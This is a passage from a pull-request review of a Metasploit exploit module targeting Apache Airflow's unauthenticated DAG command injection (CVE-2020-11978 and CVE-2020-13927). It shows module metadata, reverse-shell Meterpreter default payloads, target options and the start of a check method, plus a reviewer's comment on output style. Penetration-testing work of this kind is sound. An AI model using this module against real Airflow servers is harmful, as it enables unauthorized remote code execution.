modules/exploits/multi/http/apache_airflow_dag_rce.rb

```diff
@@ -0,0 +1,270 @@
+          allows any authenticated user to run arbitrary OS commands as the user
+          running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default
+          setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's
+          Experimental REST API to perform malicious actions such as creating the
+          vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation
+          and command injection, leading to unauthenticated remote code execution.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'xuxiang',            # Original discovery and CVE submission
+          'Pepe Berba',         # ExploitDB author
+          'Ismail E. Dawoodjee' # Metasploit module author
+        ],
+        'References' => [
+          [ 'EDB', '49927' ],
+          [ 'CVE', '2020-11978' ],
+          [ 'CVE', '2020-13927' ],
+          [ 'URL', 'https://github.com/pberba/CVE-2020-11978/' ],
+          [ 'URL', 'https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx' ],
+          [ 'URL', 'https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d' ],
+        ],
+        'Platform' => ['linux', 'unix', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows PowerShell Command',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-07-14',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080, true, 'Apache Airflow webserver default port'),
+        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
+        OptString.new('DAG_PATH', [
+          true,
+          'Path to vulnerable example DAG',
+          '/api/experimental/dags/example_trigger_target_dag'
+        ]),
+        OptInt.new('TIMEOUT', [true, 'How long to wait for payload execution (seconds)', 120])
+      ]
+    )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'admin', 'airflow', 'login')
+    print_status("Checking target web server for a response at: #{full_uri(uri)}")
```

Comment:
```suggestion
    vprint_status("Checking target web server for a response at: #{full_uri(uri)}")
```
Avoid non-verbose prints in `check` methods: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-method-output